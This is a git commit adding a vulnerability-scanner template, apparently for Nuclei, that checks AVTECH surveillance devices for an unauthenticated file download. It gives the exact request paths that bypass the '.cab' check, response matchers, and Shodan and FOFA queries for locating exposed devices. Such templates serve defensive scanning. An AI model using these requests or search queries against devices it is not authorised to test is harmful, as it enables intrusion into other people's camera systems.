Create avtech-unauth-file-download.yaml

patch-1
Ritik Chaddha 2023-05-15 23:31:22 +05:30 committed by GitHub
parent 8b2030bbb2
commit a947db87a3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: avtech-unauth-file-download
info:
name: AVTECH Video Surveillance Product - Unauthenticated File Download
author: ritikchaddha
severity: high
description: |
AVTECH video surveillance products unauthenticated file download from web root through /cgi-bin/cgibox, Since the .cab string is verified by the strstr method, the file download can be realized by adding ?.cab at the end of the file name.
metadata:
max-req: 2
verified: "true"
shodan-query: title:"login" product:"Avtech"
fofa-query: app="AVTECH-视频监控"
tags: exposure,avtech,unauth,download,iot
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/cgibox?.cab"
- "{{BaseURL}}/cgi-bin/cgibox?/nobody"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ELF'
- 'ddns_avtech_final'
condition: and
- type: word
part: header
words:
- text/plain
- type: status
status:
- 200